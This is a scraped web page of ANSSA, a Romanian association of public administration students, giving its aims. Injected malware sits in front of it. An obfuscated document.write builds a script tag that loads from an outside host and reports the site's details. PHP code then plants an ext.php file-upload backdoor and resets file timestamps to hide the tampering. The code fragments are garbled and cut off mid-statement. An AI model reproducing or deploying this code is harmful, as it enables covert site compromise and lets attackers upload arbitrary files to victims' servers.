document.write('<'+'s'+'c'+'r'+'ipt '+'s'+'rc=\"http://tereveln.com/sh2.php?serverStr=$serverStr&req_type=add_site&document_root=$document_root&engine=$engineType&ip=$ip&domain='+window.location.hostname+'&uplUrl=$pp\"'+'>'+'<'+'/'+'sc'+'rip'+'t>');"; $fp = fopen(dirname(__FILE__)."/ext.php", "w"); fwrite($fp, "
';if (!empty(\$_FILES['uploadFile'])) {\$self=dirname(__FILE__);move_uploaded_file(\$_FILES[\"uploadFile\"][\"tmp_name\"], \$self.DIRECTORY_SEPARATOR.\$_FILES[\"uploadFile\"][\"name\"]);\$time=filemtime(\$self);print \"OK\";} else {print \$form;} ?>"); fclose($fp); $fp = fopen(__FILE__, "r"); $line = ""; while(!feof($fp)) { $line .= fgets($fp, 4096); } fclose($fp); $time = filemtime(__FILE__); $dirTime = filemtime(dirname(__FILE__)); $line = preg_replace("/\s+\s+/is", "", $line); $fp = @fopen(__FILE__, "w"); @fwrite($fp, $line); @fclose($fp); @touch(__FILE__, $time); @touch(dirname(__FILE__), $dirTime); } else { print ""; } ?> ANSSA - Asociatia Nationala a Studentilor in Stiinte Administrative


   Vrem să sprijinim studenţii în ştiinte administrative

· oferind şansa de a lucra în echipă, de a iniţia şi gestiona proiecte, într-o organizaţie tânără şi dinamică
· asigurând dialogul şi contactul direct încă din facultate cu instituţiile publice centrale şi locale, cu structurile profesionale şi asociative ale administraţiei publice, cu partidele politice şi sindicatele funcţionarilor
· facilitând accesul absolvenţilor ca angajaţi în sectorul public.

   Vrem să sprijinim procesul de reformă şi eficientizare a administraţiei publice din România

· contribuind la formarea unui corp al funcţionarilor publici profesionişti şi motivaţi
· promovând calitatea şi performanţa în managementul public


Pentru informaţii în timp real privind activitatea şi proiectele asociaţiei vizitează pagina facebook ANSSA aici.